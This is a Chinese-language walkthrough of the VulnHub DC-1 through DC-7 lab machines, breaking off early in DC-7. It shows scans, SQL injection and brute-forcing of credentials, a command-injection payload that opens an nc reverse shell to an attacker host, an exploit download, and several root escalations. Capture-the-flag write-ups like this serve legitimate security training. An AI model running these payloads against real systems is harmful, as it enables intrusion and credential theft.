VulnHub DC-1-DC-7靶机WP

news2024/11/15 7:19:27

VulnHub DC系列靶机:https://vulnhub.com/series/dc,199/

# VulnHub DC-1

nmap开路获取信息

Nmap scan report for 192.168.106.133
Host is up (0.00017s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
111/tcp open  rpcbind
MAC Address: 00:0C:29:57:9F:37 (VMware)
nmap -A 192.168.106.133 //详细扫描
Starting Nmap 7.91 ( https://nmap.org ) at 2022-04-18 08:25 EDT
Nmap scan report for 192.168.106.133
Host is up (0.00032s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)
| ssh-hostkey: 
|   1024 c4:d6:59:e6:77:4c:22:7a:96:16:60:67:8b:42:48:8f (DSA)
|   2048 11:82:fe:53:4e:dc:5b:32:7f:44:64:82:75:7d:d0:a0 (RSA)
|_  256 3d:aa:98:5c:87:af:ea:84:b8:23:68:8d:b9:05:5f:d8 (ECDSA)
80/tcp  open  http    Apache httpd 2.2.22 ((Debian))
|_http-generator: Drupal 7 (http://drupal.org)
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/ 
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt 
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt 
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Apache/2.2.22 (Debian)
|_http-title: Welcome to Drupal Site | Drupal Site
111/tcp open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          32956/udp   status
|   100024  1          35985/tcp   status
|   100024  1          52275/tcp6  status
|_  100024  1          53518/udp6  status
MAC Address: 00:0C:29:57:9F:37 (VMware)
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.2 - 3.16
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.32 ms 192.168.106.133

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.96 seconds

http://192.168.106.133 //Drupal CMS

信息收集:

http://192.168.106.133/robots.txt
http://192.168.106.133/MAINTAINERS.txt //可以获取版本信息

然后用metasploit里面的模块进行攻击。

获取数据库连接信息:

$databases = array (
  'default' => 
  array (
    'default' => 
    array (
      'database' => 'drupaldb',
      'username' => 'dbuser',
      'password' => 'R0ck3t',
      'host' => 'localhost',
      'port' => '',
      'driver' => 'mysql',
      'prefix' => '',
    ),

meterpreter进入shell,执行python -c 'import pty; pty.spawn("/bin/bash")'实现完整交互式shell

进入数据库查找admin密码:select * from users limit 1,1

密码是被加密的。

尝试用新密码特换掉旧的密码。

生成新密码

ww-data@DC-1:/var/www$ php scripts/password-hash.sh pass
php scripts/password-hash.sh pass

password: pass          hash: $S$D4OKzkO1e3IZoAnIogGyiFWlKBzeOTE/r.exzdMCAzxLkcpK1bDX

替换密码:

mysql> update users set pass="$S$D4OKzkO1e3IZoAnIogGyiFWlKBzeOTE/r.exzdMCAzxLkcpK1bDX" where uid=1;
<s="$S$D4OKzkO1e3IZoAnIogGyiFWlKBzeOTE/r.exzdMCAzxLkcpK1bDX" where uid=1;    
Query OK, 1 row affected (0.00 sec)
Rows matched: 1  Changed: 1  Warnings: 0

利用新的管理员密码登录drupal后台

发现flag3:

Special PERMS will help FIND the passwd - but you'll need to -exec that command to work out how to get what's in the shadow.

cat /etc/passwd ,发现存在flag4用户。

查看/home/flag4/flag4.txt文件

www-data@DC-1:/home/flag4$ cat flag4.txt
cat flag4.txt
Can you use this same method to find or access the flag in root?

Probably. But perhaps it's not that easy.  Or maybe it is?

提示要在root下找flag。看来要提权啊啊啊啊啊

首先想到的是suid提权,找一找suid程序把/

find / -perm -4000 2>/dev/null //查找有suid权限的程序。
bin/mount
/bin/ping
/bin/su
/bin/ping6
/bin/umount
/usr/bin/at
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/procmail
/usr/bin/find
/usr/sbin/exim4
/usr/lib/pt_chown
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/sbin/mount.nfs

发现/usr/bin/find 具有suid权限。那么直接用它执行命令吧。

www-data@DC-1:/home/flag4$ find . -exec /bin/sh \;
find . -exec /bin/sh \;
# id
id
uid=33(www-data) gid=33(www-data) euid=0(root) groups=0(root),33(www-data)

成功进入具有root权限的shell

cd /root
# ls
ls
thefinalflag.txt
# cat thefinalflag.txt
cat thefinalflag.txt
Well done!!!!

Hopefully you've enjoyed this and learned some new skills.

You can let me know what you thought of this little journey
by contacting me via Twitter - @DCAU7
# 

取得了最终的flag

# Vulnhub DC-2

老规矩,nmap开路

nmap -T4 192.168.106.0/24
发现目标主机:
192.168.106.134

进行更加详细的扫描:

sudo nmap -sS -sV -p- -A 192.168.106.134 
对方开了80端口 apache2.4.10
7744 ssh OpenSSH 6.7p1

根据靶机说明,绑定一下域名

访问目标网站发现flag1:

http://dc-2/index.php/flag/

Flag

Flag 1:

Your usual wordlists probably won’t work, so instead, maybe you just need to be cewl.

More passwords is always better, but sometimes you just can’t win them all.

Log in as one to see the next flag.

If you can’t find it, log in as another.

提示我们需要爆破用户名和密码,并建议试用cewl生成字典

底部还有一个关键信息:Proudly powered by WordPress 

所以目标站点是wordpress构建的。

我们尝试用 wpscan 枚举目标的用户名

wpscan --url http://dc-2/ -e u

找到三个用户。分别是admin/jerry/tom

用cewl生成密码

cewl http://dc-2/ -w pass.txt

wpscan爆破账号和密码:

wpscan -U users.txt  -P pass.txt --url http://dc-2/

找到两个账号的密码:

Username: jerry, Password: adipiscing
 | Username: tom, Password: parturient

登录后台,找到第二个flag:

Flag 2:

If you can't exploit WordPress and take a shortcut, there is another way.

Hope you found another entry point.

淦,提示用其他方式。

根据前面的收集的信息,还有一个ssh端口。

尝试登陆试试。

发现 jerry的密码登录不了,。试试tom

可以用tom的密码登录,。

tom@DC-2:~$ cat flag3.txt
-rbash: cat: command not found
提示是一个rbash。命令受限。

查看flag3.txt的内容:

Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.

提示要切换到jerry用户,不过现在是rbash,要先绕过rbash才行。然后查看flag4.txt

tom@DC-2:~$ BASH_CMDS[a]=/bin/sh;a
$ export PATH=$PATH:/bin/
$ export PATH=$PATH:/usr/bin
$ cd jerry
a: 3: cd: can't cd to jerry
$ cd /home/jerry
$ ls
flag4.txt
$ cat flag4.txt
Good to see that you've made it this far - but you're not home yet. 

You still need to get the final flag (the only flag that really counts!!!).  

No hints here - you're on your own now.  :-)

Go on - git outta here!!!!

$ $ su jerry          //切换到jerry用户。                                             
Password:                                                          
jerry@DC-2:~$ 


使用sudo -l查看哪些可以执行sudo的命令。

发现git命令可以且不需要密码,可以利用它提权

:~$ sudo -l
Matching Defaults entries for jerry on DC-2:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User jerry may run the following commands on DC-2:
    (root) NOPASSWD: /usr/bin/git

erry@DC-2:~$ sudo git -p help config
!/bin/sh
# id
uid=0(root) gid=0(root) groups=0(root)
# cd root
/bin/sh: 2: cd: can't cd to root
# cd /root
# ls
final-flag.txt
# cat final-flag.txt
 __    __     _ _       _                    _ 
/ / /\ \ \___| | |   __| | ___  _ __   ___  / \
\ \/  \/ / _ \ | |  / _` |/ _ \| '_ \ / _ \/  /
 \  /\  /  __/ | | | (_| | (_) | | | |  __/\_/ 
  \/  \/ \___|_|_|  \__,_|\___/|_| |_|\___\/   


Congratulatons!!!

A special thanks to all those who sent me tweets
and provided me with feedback - it's all greatly
appreciated.

If you enjoyed this CTF, send me a tweet via @DCAU7.

# 

成功获取到了root权限和获取了最终的flag。

# VulnHub DC-3

老规矩,nmap开路

扫描目标:

sudo nmap -sS -sV -p- -A 192.168.106.135
Host is up (0.00040s latency).
Not shown: 65534 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: Joomla! - Open Source Content Management
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Home
MAC Address: 00:0C:29:C8:3F:2D (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

信息:开放了 80端口

web容器:Apache 2.4.18

目标系统:Ubuntu

访问80端口看看

发现是Joomla网站。使用Joomscan扫描试试

如果没有,安装一下 sudo apt install joomscan

joomscan -u http://192.168.106.135
++] Joomla 3.7.0
[+] Checking Directory Listing                                                                                                           
[++] directory has directory listing : 
http://192.168.106.135/administrator/components
http://192.168.106.135/administrator/modules
http://192.168.106.135/administrator/templates 
http://192.168.106.135/images/banners 
Admin page : http://192.168.106.135/administrator/  

扫描到了版本信息和一些目录和后台管理地址

在exploitdb中尝试查找一下Joomla 3.7.0的漏洞

searchsploit Joomla | grep 3.7.0        
Joomla! 3.7.0 - 'com_fields' SQL Injection                                                             | php/webapps/42033.txt
cat /usr/share/exploitdb/exploits/php/webapps/42033.txt 
# Exploit Title: Joomla 3.7.0 - Sql Injection
# Date: 05-19-2017
# Exploit Author: Mateus Lino
# Reference: https://blog.sucuri.net/2017/05/sql-injection-vulnerability-joomla-3-7.html
# Vendor Homepage: https://www.joomla.org/
# Version: = 3.7.0
# Tested on: Win, Kali Linux x64, Ubuntu, Manjaro and Arch Linux
# CVE : - CVE-2017-8917


URL Vulnerable: http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27


Using Sqlmap: 

sqlmap -u "http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

找到一个漏洞信息,是一个sql注入,并且给出了poc,直接上sqlmap

sqlmap -u "http://192.168.106.135/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] 
available databases [5]:
[*] information_schema
[*] joomladb
[*] mysql
[*] performance_schema
[*] sys

获取了数据库,接着获取表:

sqlmap -u "http://192.168.106.135/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb --tables 
Database: joomladb
[76 tables]
+---------------------+
| #__assets           |
| #__associations     |
| #__banner_clients   |
| #__banner_tracks    |
| #__banners          |
| #__bsms_admin       |
| #__bsms_books       |
| #__bsms_comments    |
| #__bsms_locations   |
| #__bsms_mediafiles  |
| #__bsms_message_typ |
| #__bsms_podcast     |
| #__bsms_series      |
| #__bsms_servers     |
| #__bsms_studies     |
| #__bsms_studytopics |
| #__bsms_teachers    |
| #__bsms_templatecod |
| #__bsms_templates   |
| #__bsms_timeset     |
| #__bsms_topics      |
| #__bsms_update      |
| #__categories       |
| #__contact_details  |
| #__content_frontpag |
| #__content_rating   |
| #__content_types    |
| #__content          |
| #__contentitem_tag_ |
| #__core_log_searche |
| #__extensions       |
| #__fields_categorie |
| #__fields_groups    |
| #__fields_values    |
| #__fields           |
| #__finder_filters   |
| #__finder_links_ter |
| #__finder_links     |
| #__finder_taxonomy_ |
| #__finder_taxonomy  |
| #__finder_terms_com |
| #__finder_terms     |
| #__finder_tokens_ag |
| #__finder_tokens    |
| #__finder_types     |
| #__jbsbackup_timese |
| #__jbspodcast_times |
| #__languages        |
| #__menu_types       |
| #__menu             |
| #__messages_cfg     |
| #__messages         |
| #__modules_menu     |
| #__modules          |
| #__newsfeeds        |
| #__overrider        |
| #__postinstall_mess |
| #__redirect_links   |
| #__schemas          |
| #__session          |
| #__tags             |
| #__template_styles  |
| #__ucm_base         |
| #__ucm_content      |
| #__ucm_history      |
| #__update_sites_ext |
| #__update_sites     |
| #__updates          |
| #__user_keys        |
| #__user_notes       |
| #__user_profiles    |
| #__user_usergroup_m |
| #__usergroups       |
| #__users            |
| #__utf8_conversion  |
| #__viewlevels       |
+---------------------+

看看#_users表里面信息。

sqlmap -u "http://192.168.106.135/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T "#__users" --columns

[6 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| email    | non-numeric |
| id       | numeric     |
| name     | non-numeric |
| params   | non-numeric |
| password | non-numeric |
| username | non-numeric |
+----------+-------------+

查看用户名和密码:

sqlmap -u "http://192.168.106.135/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T "#__users" -C "password,username" --dump
Database: joomladb
Table: #__users
[1 entry]
+--------------------------------------------------------------+----------+
| password                                                     | username |
+--------------------------------------------------------------+----------+
| $2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu | admin    |
+--------------------------------------------------------------+----------+

密码是加密的。尝试破解一下。就用自带的 John破解工具试试

john pass.txt
破解出来密码是:snoopy

登录后台试试。成功登录了

image-20220419205521117

在Template里面写一个shell

用msf生成一个php webshell,然后写入,访问,获取会话

getuid 
Server username: www-data (33)

获取到的权限是 www-data用户

查看系统信息:

cat /etc/os-release
NAME="Ubuntu"
VERSION="16.04 LTS (Xenial Xerus)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 16.04 LTS"
VERSION_ID="16.04"
name -a
Linux DC-3 4.4.0-21-generic 

搜一下系统版本相关的漏洞

searchsploit Ubuntu 16.04
------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                 |  Path
------------------------------------------------------------------------------- ---------------------------------
Apport 2.x (Ubuntu Desktop 12.10 < 16.04) - Local Code Execution               | linux/local/40937.txt
Exim 4 (Debian 8 / Ubuntu 16.04) - Spool Privilege Escalation                  | linux/local/40054.c
Google Chrome (Fedora 25 / Ubuntu 16.04) - 'tracker-extract' / 'gnome-video-th | linux/local/40943.txt
LightDM (Ubuntu 16.04/16.10) - 'Guest Account' Local Privilege Escalation      | linux/local/41923.txt
Linux Kernel (Debian 7.7/8.5/9.0 / Ubuntu 14.04.2/16.04.2/17.04 / Fedora 22/25 | linux_x86-64/local/42275.c
Linux Kernel (Debian 9/10 / Ubuntu 14.04.5/16.04.2/17.04 / Fedora 23/24/25) -  | linux_x86/local/42276.c
Linux Kernel (Ubuntu 16.04) - Reference Count Overflow Using BPF Maps          | linux/dos/39773.txt
Linux Kernel 4.14.7 (Ubuntu 16.04 / CentOS 7) - (KASLR & SMEP Bypass) Arbitrar | linux/local/45175.c
Linux Kernel 4.4 (Ubuntu 16.04) - 'BPF' Local Privilege Escalation (Metasploit | linux/local/40759.rb
Linux Kernel 4.4 (Ubuntu 16.04) - 'snd_timer_user_ccallback()' Kernel Pointer  | linux/dos/46529.c
Linux Kernel 4.4.0 (Ubuntu 14.04/16.04 x86-64) - 'AF_PACKET' Race Condition Pr | linux_x86-64/local/40871.c
Linux Kernel 4.4.0-21 (Ubuntu 16.04 x64) - Netfilter 'target_offset' Out-of-Bo | linux_x86-64/local/40049.c
Linux Kernel 4.4.0-21 < 4.4.0-51 (Ubuntu 14.04/16.04 x64) - 'AF_PACKET' Race C | windows_x86-64/local/47170.c
Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' bpf(BPF_PROG_LOAD) Privil | linux/local/39772.txt
Linux Kernel 4.6.2 (Ubuntu 16.04.1) - 'IP6T_SO_SET_REPLACE' Local Privilege Es | linux/local/40489.txt
Linux Kernel 4.8 (Ubuntu 16.04) - Leak sctp Kernel Pointer                     | linux/dos/45919.c
Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation  | linux/local/45010.c
Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation         | linux/local/44298.c
Linux Kernel < 4.4.0-21 (Ubuntu 16.04 x64) - 'netfilter target_offset' Local P | linux_x86-64/local/44300.c
Linux Kernel < 4.4.0-83 / < 4.8.0-58 (Ubuntu 14.04/16.04) - Local Privilege Es | linux/local/43418.c
Linux Kernel < 4.4.0/ < 4.8.0 (Ubuntu 14.04/16.04 / Linux Mint 17/18 / Zorin)  | linux/local/47169.c
------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

找到一个和目标系统符合的漏洞信息:
Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' bpf(BPF_PROG_LOAD) Privil | linux/local/39772.txt
cat /usr/share/exploitdb/exploits/linux/local/39772.txt 
是一个eBPF 本地提权漏洞
下载利用脚本到目标机
www-data@DC-3:/tmp$ wget http://192.168.106.132:8080/39772.zip

解压然后利用提权

www-data@DC-3:/tmp/39772/ebpf_mapfd_doubleput_exploit$ ./compile.sh
www-data@DC-3:/tmp/39772/ebpf_mapfd_doubleput_exploit$ chmod +x doubleput
chmod +x doubleput
www-data@DC-3:/tmp/39772/ebpf_mapfd_doubleput_exploit$ ./doubleput
writev returned successfully. if this worked, you'll have a root shell in <=60 seconds.
suid file detected, launching rootshell...
we have root privs now...
root@DC-3:/tmp/39772/ebpf_mapfd_doubleput_exploit# 
root@DC-3:/tmp/39772/ebpf_mapfd_doubleput_exploit# id
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
root@DC-3:/tmp/39772/ebpf_mapfd_doubleput_exploit# whoami
whoami
root
root@DC-3:/tmp/39772/ebpf_mapfd_doubleput_exploit# 

提权成功。

cd /root
root@DC-3:/root# ls
ls
the-flag.txt
root@DC-3:/root# cat the-flag.txt
cat the-flag.txt
 __        __   _ _   ____                   _ _ _ _ 
 \ \      / /__| | | |  _ \  ___  _ __   ___| | | | |
  \ \ /\ / / _ \ | | | | | |/ _ \| '_ \ / _ \ | | | |
   \ V  V /  __/ | | | |_| | (_) | | | |  __/_|_|_|_|
    \_/\_/ \___|_|_| |____/ \___/|_| |_|\___(_|_|_|_)
                                                     

Congratulations are in order.  :-)

I hope you've enjoyed this challenge as I enjoyed making it.

If there are any ways that I can improve these little challenges,
please let me know.

As per usual, comments and complaints can be sent via Twitter to @DCAU7

Have a great day!!!!
root@DC-3:/root# 

成功获取到了flag。

DC3总结:利用Joomla 3.7 SQL注入漏洞,dump后台登录用户和密码,在template中写入webshell。连接webshell获取系统shell,利用Ubuntu 16.04 本地提权漏洞获取Root权限,获取最终的flag。

# VulnHub DC4

nmap开路

Nmap scan report for 192.168.106.136
Host is up (0.0018s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
初步确定,目标开了22端口和80端口。
80/tcp open  http    nginx 1.15.10
|_http-server-header: nginx/1.15.10
OpenSSH 7.4p1 Debian 10+deb9u6

访问80端口页面,发现一个登录页面。

尝试直接爆破试试。

hydra -l admin -P "/usr/share/wordlists/rockyou.txt" 192.168.106.136 -s 80 http-post-form "/login.php:username=^USER^&password=^PASS^:S=logout" -f
[80][http-post-form] host: 192.168.106.136   login: admin   password: happy

爆破密码为 happy

登录看看

发现一个命令执行工具。

反弹一个shell试试吧。

反弹成功。查看权限发现是www权限

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

发现jim用户目录有一个密码备份文件。

cat old-passwords.bak
000000
12345
iloveyou
1q2w3e4r5t
1234
123456a
qwertyuiop
monkey

尝试爆破一下jim的密码:

[22][ssh] host: 192.168.106.136   login: jim   password: jibril04

登录一下

登录后提示有一封邮件,查看邮件内容。

jim@dc-4:~$ cat /var/mail/jim 
From charles@dc-4 Sat Apr 06 21:15:46 2019
Return-path: <charles@dc-4>
Envelope-to: jim@dc-4
Delivery-date: Sat, 06 Apr 2019 21:15:46 +1000
Received: from charles by dc-4 with local (Exim 4.89)
        (envelope-from <charles@dc-4>)
        id 1hCjIX-0000kO-Qt
        for jim@dc-4; Sat, 06 Apr 2019 21:15:45 +1000
To: jim@dc-4
Subject: Holidays
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <E1hCjIX-0000kO-Qt@dc-4>
From: Charles <charles@dc-4>
Date: Sat, 06 Apr 2019 21:15:45 +1000
Status: O

Hi Jim,

I'm heading off on holidays at the end of today, so the boss asked me to give you my password just in case anything goes wrong.

Password is:  ^xHhA&hvim0y

See ya,
Charles

邮件告诉了我们charles用户的密码。

登录charles用户试试,。可以登录

但没啥用,没啥东西。尝试提权。

查找suid程序无果。

查看sudo 程序

charles@dc-4:~$ sudo -l
Matching Defaults entries for charles on dc-4:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User charles may run the following commands on dc-4:
    (root) NOPASSWD: /usr/bin/teehee
charles@dc-4:~$ 

发现 /usr/bin/teehee有sudo权限,无需密码

利用它写入root权限用户。

harles@dc-4:~$ echo "fuck::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
fuck::0:0:::/bin/bash
charles@dc-4:~$ su fuck
root@dc-4:/home/charles# id
uid=0(root) gid=0(root) groups=0(root)
root@dc-4:/home/charles# cat /root/flag.txt 



888       888          888 888      8888888b.                             888 888 888 888 
888   o   888          888 888      888  "Y88b                            888 888 888 888 
888  d8b  888          888 888      888    888                            888 888 888 888 
888 d888b 888  .d88b.  888 888      888    888  .d88b.  88888b.   .d88b.  888 888 888 888 
888d88888b888 d8P  Y8b 888 888      888    888 d88""88b 888 "88b d8P  Y8b 888 888 888 888 
88888P Y88888 88888888 888 888      888    888 888  888 888  888 88888888 Y8P Y8P Y8P Y8P 
8888P   Y8888 Y8b.     888 888      888  .d88P Y88..88P 888  888 Y8b.      "   "   "   "  
888P     Y888  "Y8888  888 888      8888888P"   "Y88P"  888  888  "Y8888  888 888 888 888 


Congratulations!!!

Hope you enjoyed DC-4.  Just wanted to send a big thanks out there to all those
who have provided feedback, and who have taken time to complete these little
challenges.

If you enjoyed this CTF, send me a tweet via @DCAU7.
root@dc-4:/home/charles# 

成功获取了flag。

# VulnHub DC5

老规矩,nmap开路

Nmap scan report for 192.168.106.137
Host is up (0.00045s latency).
Not shown: 998 closed ports
PORT    STATE SERVICE
80/tcp  open  http
111/tcp open  rpcbind
sudo nmap -sS -sV -p- -A 192.168.106.137
80/tcp    open  http    nginx 1.6.2
|_http-server-header: nginx/1.6.2
|_http-title: Welcome
111/tcp   open  rpcbind 2-4 (RPC #100000)

发现目标开放了80端口和111端口,其他没有什么有用的端口,访问80端口看看

留言页面跳转后有一个 thankyou.php的页面

刷新,发现页脚的文字发生了变化。怀疑thankyou.php存在文件包含。,

先用dirb扫一下目录文件看看

发现存在footer.php文件,thankyou.php页面底部的文字变化可能是包含了footer.php文件

访问一下footer.php文件看看,看到刷新会变化,证实了我们的猜想

fuzz一下变量名:

参数是file

尝试文件包含 http://192.168.106.137/thankyou.php?file=/etc/passwd

发现可以成功。

结合前面的信息 nginx/1.6.2 ,可以尝试包含nginx日志文件获取webshell

nginx的log在/var/log/nginx/access.log和/var/log/nginx/error.log

包含 access.log HTTP/1.1 500 Internal Server Error

包含access.log写入webshell,。连接。

获得www用户权限。

尝试提权。

查找具有suid权限的可执行文件

find / -perm -4000 2>/dev/null

/bin/su
/bin/mount
/bin/umount
/bin/screen-4.5.0
/usr/bin/gpasswd
/usr/bin/procmail
/usr/bin/at
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/chsh
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/sbin/exim4
/sbin/mount.nfs

发现一个 /bin/screen-4.5.0 。

搜一搜漏洞信息

利用本地提权。上传利用脚本,然后执行提权。

# VulnHub DC-6

nmap扫描

Nmap scan report for 192.168.106.138
Host is up (0.0025s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
sudo nmap -sS -sV -p- -A 192.168.106.138

22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
|
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Did not follow redirect to http://wordy/
MAC Address: 00:0C:29:D2:51:D1 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9


基本信息:开放了22端口,80端口,

根据靶机描述,绑定一下域名-ip

NOTE: You WILL need to edit your hosts file on your pentesting device so that it reads something like:

192.168.106.138 wordy

访问80端口看看 http://wordy/

发现目标是一个 wordpress站点,

尝试用wpscan扫描看看。

wpscan --url http://wordy/  

扫描结果显示,没什么有用的信息。

尝试爆破一下登录信息

wpscan -e u --url http://wordy/
找到一些用户:
admin
graham
mark
sarah
jens
wpscan --url http://wordy/ -U puser.txt -P /usr/share/wordlists/rockyou.txt //爆破密码
有个提示:cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt //简化爆破字典
wpscan --url http://wordy/ -U puser.txt -P passwords.txt
找到一个密码:mark / helpdesk01

用爆破的密码登录目标网站后台:

看到有个 Activity Monitor插件,众所周知,wordpress的插件很容易有漏洞。

去搜一搜漏洞信息。找到一个命令执行

尝试利用反弹shell。

127.0.0.1|nc -e /bin/bash 192.168.106.132 9999
nc -lvvp 9999                      
listening on [any] 9999 ...
connect to [192.168.106.132] from wordy [192.168.106.138] 47134

反弹成功。

拿到的权限是www用户权限

ww-data@dc-6:/var/www$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@dc-6:/var/www$ 

目标信息收集

www-data@dc-6:/home/jens$ cat backups.sh
cat backups.sh
#!/bin/bash
tar -czf backups.tar.gz /var/www/html
www-data@dc-6:/home/jens$ 
在 jens用户下发现一个 backups.sh脚本
www-data@dc-6:/home/mark/stuff$ cat things-to-do.txt
cat things-to-do.txt
Things to do:

- Restore full functionality for the hyperdrive (need to speak to Jens)
- Buy present for Sarah's farewell party
- Add new user: graham - GSo7isUM1D4 - done
- Apply for the OSCP course
- Buy new laptop for Sarah's replacement
在 mark用户目录下发现一个文本文件,里面有 graham用户的密码。
提示需要切换到 Jens用户。

用graham登录一下目标

尝试收集一下 sudo 程序和suid程序信息

graham@dc-6:~$ find / -perm -4000 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/passwd
/bin/su
/bin/mount
/bin/umount
/bin/ping
sudo -l
Matching Defaults entries for graham on dc-6:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User graham may run the following commands on dc-6:
    (jens) NOPASSWD: /home/jens/backups.sh

suid没有什么可利用的。但是 /home/jens/backups.sh 可以以jens用户执行,且不需要密码。

利用这个脚本,尝试获取 jens用户的shell。

graham@dc-6:~$ sudo -u jens /home/jens/backups.sh 
ens@dc-6:/home/graham$ sudo -l
sudo -l
Matching Defaults entries for jens on dc-6:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User jens may run the following commands on dc-6:
    (root) NOPASSWD: /usr/bin/nmap

发现nmap可以以root用户运行而不需要密码

可以用nmap提权。

jens@dc-6:/home/graham$ cd /tmp
cd /tmp
jens@dc-6:/tmp$ echo 'os.execute("/bin/sh")' > test.nse
echo 'os.execute("/bin/sh")' > test.nse
jens@dc-6:/tmp$ sudo nmap --script=test.nse
sudo nmap --script=test.nse

Starting Nmap 7.40 ( https://nmap.org ) at 2022-04-21 22:53 AEST
# id
uid=0(root) gid=0(root) groups=0(root)
# 

成功获取了root权限。

# cd /root
# ls
theflag.txt
# cat theflag.txt


Yb        dP 888888 88     88         8888b.   dP"Yb  88b 88 888888 d8b 
 Yb  db  dP  88__   88     88          8I  Yb dP   Yb 88Yb88 88__   Y8P 
  YbdPYbdP   88""   88  .o 88  .o      8I  dY Yb   dP 88 Y88 88""   `"' 
   YP  YP    888888 88ood8 88ood8     8888Y"   YbodP  88  Y8 888888 (8) 


Congratulations!!!

Hope you enjoyed DC-6.  Just wanted to send a big thanks out there to all those
who have provided feedback, and who have taken time to complete these little
challenges.

If you enjoyed this CTF, send me a tweet via @DCAU7.



成功获取了flag。

# VulnHub -DC7

老规矩,nmap开路

sudo nmap -sS -sV -p- -A 192.168.106.139 
Host is up (0.00043s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)

80/tcp open  http    Apache httpd 2.4.25 ((Debian))
|_http-generator: Drupal 8 (https://www.drupal.org)
| http-robots.txt: 22 disallowed entries (15 shown)
| /core/ /profiles/ /README.txt /web.config /admin/ 
| /comment/reply/ /filter/tips /node/add/ /search/ /user/register/ 
| /user/password/ /user/login/ /user/logout/ /index.php/admin/ 
|_/index.php/comment/reply/
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Welcome to DC-7 | D7
开放了80端口,22端口。


访问网站看看

